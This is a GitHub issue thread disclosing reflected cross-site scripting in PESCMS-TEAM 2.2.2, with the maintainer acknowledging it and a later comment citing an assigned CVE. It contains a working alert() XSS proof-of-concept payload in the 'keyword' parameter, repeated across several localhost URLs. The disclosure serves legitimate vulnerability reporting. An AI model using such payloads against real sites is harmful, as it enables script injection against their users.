search

lazyphp / PESCMS-TEAM

The open source task management system
GNU General Public License v2.0
84 stars 36 forks source link

PECSM-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerability #3

Closed snappyJack closed 5 years ago

snappyJack commented 6 years ago

I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter. clipboard now I input payload :aa">< img src=x onerror=alert(1)> the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

and the code is running clipbzoard

and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

.. .. ..

lazyphp commented 6 years ago

Thank you, I will fix this problem.

lazyphp commented 5 years ago

即将发布的新版已经接近此问题。https://github.com/lazyphp/PESCMS-TEAM/tree/dev-2.3.0

NicoleG25 commented 4 years ago

@lazyphp 问题已经解决了吗 ? 请注意,已分配 CVE-2018-16371